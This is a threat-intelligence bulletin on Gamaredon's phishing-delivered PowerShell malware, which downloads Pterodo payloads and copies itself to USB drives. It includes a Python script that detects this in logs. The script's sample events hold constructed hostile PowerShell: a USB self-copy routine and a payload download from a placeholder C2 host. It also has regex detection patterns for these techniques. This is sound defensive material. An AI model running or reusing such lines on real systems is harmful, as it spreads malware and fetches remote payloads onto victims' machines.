
June 15, 2023 |

Russian hackers use PowerShell USB malware to drop backdoors


Source: Bleeping Computer

Summary

The Russian state-sponsored hacking group known as Gamaredon continues to target Ukraine’s military and security intelligence sectors with updated TTPs. In addition to its use of information stealers and default Word template hijackers, Gamaredon is now using USB malware to help spread to additional systems inside infected networks.

Gamaredon continues to rely primarily on phishing emails for initial access. Once opened, the attachment launches a PowerShell command that downloads a 'Pterodo' payload from the attacker's command-and-control (C2) server. The same PowerShell script also enumerates all drives on the computer and copies itself to any removable USB disks found attached to the device.
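The USB self-propagation behaviour described above gives defenders something concrete to look for in PowerShell script-block logging (Event ID 4104). The following Python is an added example, not code from the article or from Field Effect: it runs a simple heuristic over constructed sample log entries and flags scripts that combine drive enumeration with a self-copy, raising confidence when a removable-drive filter is also present. The indicator patterns and sample scripts are assumptions for illustration, not Gamaredon's actual code.

```python
import re

# Constructed sample script-block log entries (Event ID 4104 style).
# The script text is illustrative only, not real malware.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Get-ChildItem C:\\Users\\alice\\Documents | Select-Object Name"},
    {"id": 2, "script": (
        "$drives = Get-WmiObject Win32_LogicalDisk | Where-Object {$_.DriveType -eq 2};"
        "foreach ($d in $drives) { Copy-Item $MyInvocation.MyCommand.Path "
        "($d.DeviceID + '\\update.ps1') }")},
    {"id": 3, "script": "Get-PSDrive -PSProvider FileSystem | Format-Table"},
    {"id": 4, "script": "Invoke-WebRequest http://C2-PLACEHOLDER/p -OutFile $env:TEMP\\p.exe"},
]

# Indicator name -> regex. DriveType 2 is 'removable disk' in Win32_LogicalDisk;
# System.IO.DriveInfo exposes the same thing as the 'Removable' enum value.
INDICATORS = {
    "enumerates_drives": re.compile(
        r"Win32_LogicalDisk|Get-PSDrive|\[System\.IO\.DriveInfo\]::GetDrives", re.I),
    "filters_removable": re.compile(
        r"DriveType\s*-eq\s*2|DriveType\s*-eq\s*['\"]Removable['\"]", re.I),
    "self_copy": re.compile(r"Copy-Item\s+\$MyInvocation|\$PSCommandPath", re.I),
    "downloads_payload": re.compile(
        r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b", re.I),
}


def indicators_for(event):
    """Return the names of all indicators matched by one script-block event."""
    return [name for name, rx in INDICATORS.items() if rx.search(event["script"])]


def classify(event):
    """Label an event. Drive enumeration alone (event 3) is normal admin activity;
    only enumeration combined with a self-copy is treated as USB propagation."""
    hits = indicators_for(event)
    if "enumerates_drives" in hits and "self_copy" in hits:
        return "usb_propagation_high" if "filters_removable" in hits else "usb_propagation"
    if "downloads_payload" in hits:
        return "downloader"
    return "benign"


def triage(events):
    """Map event id -> label for a batch of script-block log entries."""
    return {e["id"]: classify(e) for e in events}


if __name__ == "__main__":
    for event_id, label in triage(SAMPLE_EVENTS).items():
        print(event_id, label)
```

In production the same logic would be fed from the 4104 ScriptBlockText field rather than an inline list, and a matching `downloader` and `usb_propagation` hit from the same host within minutes is the chain the article describes.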

Analysis

The use of USB malware is not novel. However, it remains an effective way to propagate through a victim’s network, as the malware is designed to install itself onto any device the USB disk is inserted into. It also has the added benefit of being able to cross into air-gapped networks, which are typically used by the military and intelligence organizations that Gamaredon usually targets.

In 2021, Ukraine’s intelligence service, the SBU, publicly attributed Gamaredon to the Crimea-based branch of Russia’s Federal Security Service (FSB). They added that Gamaredon has carried out more than 5,000 attacks against Ukrainian entities, targeting critical infrastructure such as power plants and water facilities, harvesting classified information from government agencies, conducting misinformation campaigns, and disrupting IT systems.

Mitigation

Field Effect recommends that governments and organizations in Ukraine, and those supporting Ukraine, adopt a heightened cybersecurity posture given the threat posed by Russian state-sponsored cyber actors such as Gamaredon. We encourage all organizations to review the U.S. Cybersecurity & Infrastructure Security Agency (CISA) ShieldsUp program, which provides robust guidance for preparing for, responding to, and mitigating the impacts of Russian state-sponsored cyber attacks.

Field Effect’s elite team of Security Intelligence professionals constantly monitors the cyber threat landscape for novel TTPs and IoCs associated with nation-state-sponsored groups such as Gamaredon. This research contributes to the timely deployment of signatures into Covalence to detect and mitigate threat activity.

Further references